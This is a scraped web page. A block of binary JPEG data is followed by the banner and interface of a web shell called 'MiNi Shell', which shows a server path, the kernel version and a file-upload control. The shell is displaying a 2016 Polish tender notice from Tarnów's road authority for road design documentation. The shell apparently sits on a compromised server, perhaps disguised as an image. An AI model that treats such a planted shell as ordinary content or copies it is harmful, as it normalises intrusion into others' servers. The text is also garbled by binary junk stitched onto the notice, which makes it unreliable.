JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160706/122869-N-2016.html

<p class="kh_header"><b>Tarnów: Wykonanie dokumentacji projektowej przebudowy i remontu dróg w Tarnowie</b><br>
<b>Numer ogłoszenia: 122869 - 2016; data zamieszczenia: 06.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Komunikacji w Tarnowie , ul. Bernardyńska 24, 33-100 Tarnów, woj. małopolskie, tel. 14 6883100; 6883101, faks 14 6883115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdik.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej przebudowy i remontu dróg w Tarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
wykonanie dokumentacji projektowej budowy i przebudowy dróg w Tarnowie. Zamówienie podzielone zostało
na cztery zadania (części): a)	Zadanie nr 1: obejmuje wykonanie dokumentacji projektowej przebudowy ul. Siewnej wraz z pełnieniem nadzoru autorskiego.
b)	Zadanie nr 2: obejmuje wykonanie dokumentacji technicznej drogi dojazdowej do obiektów TOSiR przy ul. Wojska Polskiego - ZRID.
c)	Zadanie nr 3: obejmuje opracowanie dokumentacji na kompleksowy remont ul. Rzędzińskiej.
d)	Zadanie nr 4: obejmuje wykonanie dokumentacji projektowej przebudowy ul. Barwnej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na
podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na
podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na
podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy składaniu oferty na zadanie nr 1 i/lub zadanie nr 2 i/lub zadanie nr 3 i/lub zadanie nr 4 zamawiający wymaga wykazania, że wykonawca dysponuje lub będzie dysponował:
- minimum 1 osobą posiadającą uprawnienia budowlane co najmniej w ograniczonym zakresie do projektowania w specjalności inżynieryjnej drogowej oraz doświadczenie zawodowe w projektowaniu, tj. wykonała co najmniej jeden Projekt dotyczący budowy i/lub przebudowy i/lub remontu drogi o kategorii co najmniej drogi gminnej (ustawa z dnia 21 marca 1985 r. o drogach publicznych określa kategorię dróg - t.j. Dz. U. z 2015 r., poz. 460 ze zm.) - osoba ta będzie pełniła funkcję projektanta.
Dodatkowo przy składaniu oferty na zadanie nr 1 i/lub zadanie nr 4 zamawiający wymaga wykazania, że wykonawca dysponuje lub będzie dysponował:
- minimum 1 osobą posiadającą uprawnienia budowlane co najmniej w ograniczonym zakresie do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych - osoba ta będzie pełniła funkcję projektanta.
Dodatkowo przy składaniu oferty na zadanie nr 2 i/lub zadanie nr 3 zamawiający wymaga wykazania, że wykonawca dysponuje lub będzie dysponował:
- minimum 1 osobą posiadającą uprawnienia budowlane co najmniej w ograniczonym zakresie do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych - osoba ta będzie pełniła funkcję projektanta oraz
- minimum 1 osobą posiadającą uprawnienia budowlane w co najmniej ograniczonym zakresie do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - osoba ta będzie pełniła funkcję projektanta.
W przypadku uprawnień budowlanych do wykonywania samodzielnych funkcji w budownictwie, określonych w ustawie Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290), dla wyżej wymienionej osoby dopuszcza się odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub z zastrzeżeniem przepisu art. 12a ustawy Prawo budowlane odpowiadające im kwalifikacje zawodowe uprawniające do projektowania w danej specjalności nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym lub Konfederacji Szwajcarskiej, zgodnie z przepisami ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65).


Zamawiający dokona oceny spełniania warunku na podstawie analizy treści
oświadczeń i dokumentu, o których mowa w pkt. III.4.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na
podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem
zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone
przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub
miejsce zamieszkania, lub przed notariuszem (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert). 2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w
przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust.
2b ustawy Prawo zamówień publicznych, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych
podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty. 3.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania
ich w postępowaniu wspólnie lub reprezentowania w postępowaniu i zawarcia wspólnie umowy w sprawie
zamówienia publicznego. 4. Pełnomocnictwa złożone do przetargu mają być podpisane przez osobę
upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu wykonawcy. 5. Pełnomocnictwo należy
złożyć w formie oryginału lub kopii poświadczonej notarialnie. 6. Dokumenty sporządzone w języku obcym są
składane wraz z tłumaczeniem na język polski. 6. Wykonawcy, o których mowa w pkt 3 składają jedną ofertę,
przy czym wymagane dokumenty i oświadczenia wskazane w pkt III.4.2) oraz w pkt III.4.4) składa każdy z
wykonawców. Oświadczenie o spełnieniu warunków udziału w postępowaniu określone w pkt III.4.1) składa każdy z członków konsorcjum lub pełnomocnik w imieniu konsorcjum. 7. Warunek dysponowania osobami
zdolnymi do wykonania zamówienia zostanie spełniony przez konsorcjum w przypadku, gdy jeden z członków
konsorcjum spełni warunek, bądź warunek zostanie spełniony łącznie. 8. Wykonawcy składający wspólną ofertę
ponoszą solidarną odpowiedzialność za niewykonanie bądź nienależyte wykonanie zobowiązania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Rozszerzenie okresu rękojmi za wady przedmiotu zamówienia - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zadanie nr 1, 2 i 3:
1.	Zmiany mogą nastąpić, z uwzględnieniem art. 144 Pzp, w szczególności w następującym zakresie:
1)	Terminu wykonania przedmiotu umowy w przypadkach:
a)	wystąpienia zamówień dodatkowych warunkujących wykonanie dokumentacji,
b)	wystąpienia zdarzeń losowych, 
c)	opóźnienia w uzyskaniu decyzji, warunków technicznych, uzgodnień niezależnego od wykonawcy, a także w przypadku zmiany uzgodnienia, bądź wniesienia po wydaniu decyzji lub uzgodnień dodatkowych wymogów skutkujących koniecznością dokonania zmian lub uzupełnień w projekcie,
d)	zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają,
e)	w przypadku konieczności dokonania korekt w zatwierdzonym przez zamawiającego rozwiązaniu projektowym, wynikających ze stanowiska instytucji uzgadniających (opiniujących),
f)	konieczności wykonania dodatkowych badań, ekspertyz, analiz.
2)	Sposobu i zakresu wykonania prac w przypadkach:
a)	zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych lub uzyskania dodatkowych decyzji,
b)	zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
c)	ograniczenia zakresu rzeczowego wynikłego z zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. 
3)	Innych postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług, w takim przypadku zmianie ulegnie wartość brutto,
b)	zmiany nazwy zadania,
c)	przekształceń wykonawcy lub zbycia przedsiębiorstwa,
d)	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy.
2.	Wykonawca nie może przenieść na osobę trzecią praw lub obowiązków wynikających z umowy w całości lub części, z zastrzeżeniem zapisów umowy.
3.	Zamawiającemu przysługuje prawo odstąpienia od umowy w przypadku rozpoczęcia postępowania upadłościowego lub  likwidacji firmy wykonawcy. 
4.	W przypadku zaistnienia okoliczności określonych w ust. 3 wykonawca zobowiązany jest do niezwłocznego powiadomienia zamawiającego, w formie pisemnej.
5.	Zmiana postanowień umowy może nastąpić za zgodą obu stron na piśmie w formie aneksu pod rygorem nieważności.

Zadanie nr 4:
1.	Zmiany mogą nastąpić, z uwzględnieniem art. 144 Pzp, w szczególności w następującym zakresie:
1)	Terminu wykonania przedmiotu umowy w przypadkach:
a)	wystąpienia zamówień dodatkowych warunkujących wykonanie dokumentacji,
b)	wystąpienia zdarzeń losowych, 
c)	opóźnienia w uzyskaniu decyzji, warunków technicznych, uzgodnień niezależnego od wykonawcy, a także w przypadku zmiany uzgodnienia, bądź wniesienia po wydaniu decyzji lub uzgodnień dodatkowych wymogów skutkujących koniecznością dokonania zmian lub uzupełnień w projekcie,
d)	zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają,
e)	w przypadku konieczności dokonania korekt w zatwierdzonym przez zamawiającego rozwiązaniu projektowym, wynikających ze stanowiska instytucji uzgadniających (opiniujących),
f)	konieczności wykonania dodatkowych badań, ekspertyz, analiz.
2)	Sposobu i zakresu wykonania prac w przypadkach:
a)	zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych lub uzyskania dodatkowych decyzji,
b)	zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
c)	ograniczenia zakresu rzeczowego wynikłego z zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy. 
3)	Innych postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług, w takim przypadku zmianie ulegnie wartość brutto,
b)	zmiany nazwy zadania,
c)	przekształceń wykonawcy lub zbycia przedsiębiorstwa,
d)	zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy,
e)	ograniczenia zakresu rzeczowego przedmiotu umowy,
f)	ograniczenia zakresu umownego przedmiotu umowy.
2.	Wykonawca nie może przenieść na osobę trzecią praw lub obowiązków wynikających z umowy w całości lub części, z zastrzeżeniem zapisów umowy.
3.	Zamawiającemu przysługuje prawo odstąpienia od umowy w przypadku rozpoczęcia postępowania upadłościowego lub  likwidacji firmy wykonawcy. 
4.	W przypadku zaistnienia okoliczności określonych w ust. 3 wykonawca zobowiązany jest do niezwłocznego powiadomienia zamawiającego, w formie pisemnej.
5.	Zmiana postanowień umowy może nastąpić za zgodą obu stron na piśmie w formie aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.malopolska.pl/zdik<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego: Zarząd Dróg i Komunikacji w Tarnowie, ul. Bernardyńska 24, 33-100 Tarnów, pokój nr
201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2016 godzina 11:00, miejsce: siedziba zamawiającego: Zarząd Dróg i Komunikacji w Tarnowie, ul. Bernardyńska 24, 33-100 Tarnów, pokój nr
201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie przewiduje zawarcia umowy ramowej. 2. Zamawiający nie przewiduje
ustanowienia dynamicznego systemu zakupów. 3. Zamawiający nie przewiduje przeprowadzenia aukcji
elektronicznej. 4. Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia. 5.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających. 6. Nie przewidziano dialogu technicznego. 7.
Rozliczenia między zamawiającym a wykonawcą będą się odbywały w PLN. 8. Koszty związane z
przygotowaniem oferty ponosi wykonawca, z zastrzeżeniem art. 93 ust. 4 ustawy Prawo zamówień publicznych.
9. Zamawiający nie przewiduje możliwości wykluczenia wykonawcy z postępowania na podstawie art. 24 ust. 2a
ustawy Prawo zamówień publicznych. 10. Wykonawca zobowiązany będzie do wniesienia zabezpieczenia
należytego wykonania umowy w wysokości 5% wynagrodzenia umownego (dotyczy każdej części zamówienia).
11. Jeżeli wykonawca złoży ofertę, której wybór prowadziłby do powstania u zamawiającego obowiązku
podatkowego zgodnie z przepisami o podatku od towarów i usług, zamawiający, w celu oceny takiej oferty
doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z
tymi przepisami. Zgodnie z art. 91 ust. 3a Pzp wykonawca, składając ofertę, informuje zamawiającego, czy
wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując nazwę
(rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz
wskazując ich wartość bez kwoty podatku. Stosowną informację należy zawrzeć w formularzu oferty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowej przebudowy 
ul. Siewnej wraz z pełnieniem nadzoru autorskiego realizowanego w ramach zadania pn. Dokumentacje drogowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres zamówienia obejmuje wykonanie dokumentacji projektowej niezbędnej do dokonania zgłoszenia robót budowlanych bądź pozwolenia na budowę z podziałem na następujące etapy:
1)	ETAP I:
a)	Remont ul. Siewnej na odcinku od ul. Mościckiego do końca istniejącej nawierzchni asfaltowej.
2)	ETAP II:
a)	Przebudowa ul. Siewnej na odcinku: od zakończenia etapu I do działki nr 172/2 obręb 199 z dostosowaniem do parametrów drogi klasy L z jednostronnych chodnikiem oraz budowę miejsca do zawracania pojazdów na działkach 308/4, 166/1, 164/3 obręb 199.
3)	ETAP III:
a)	Przebudowa ulicy Siewnej z dostosowaniem do parametrów drogi klasy D na działkach: 195/13; 195/12; 183/12; 183/3; 183/8.
4)	Zakres zamówienia dla każdego etapu odrębnie obejmuje:
a)	Wykonanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500.
b)	Wykonanie badań geologicznych w zakresie niezbędnym do prawidłowego opracowania dokumentacji.
c)	Budowę odwodnienia ulicznego.
d)	Wykonanie kanału technologicznego w oparciu o rurę osłonową o przekroju min. O 110 
i O 60 mm
e)	Zabezpieczenie lub przełożenie istniejącego uzbrojenia podziemnego i naziemnego, wynikające z uzyskanych warunków technicznych od ich użytkowników.
f)	Wykonanie przedmiarów robót.
g)	Wykonanie kosztorysów inwestorskich.
h)	Wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych.
i)	Uzyskanie wymaganych uzgodnień, decyzji i pozwoleń o ile są wymagane przepisami prawa.
j)	Sporządzenie projektów wniosków zgłoszeniowych lub wniosków o wydanie pozwolenia na budowę do właściwego organu architektury.
k)	Uzgodnienie niezbędnych branż w Zarządzie Dróg i Komunikacji w Tarnowie oraz u ew. gestorów właściwych sieci.
l)	Wykonanie inwentaryzacji zieleni.
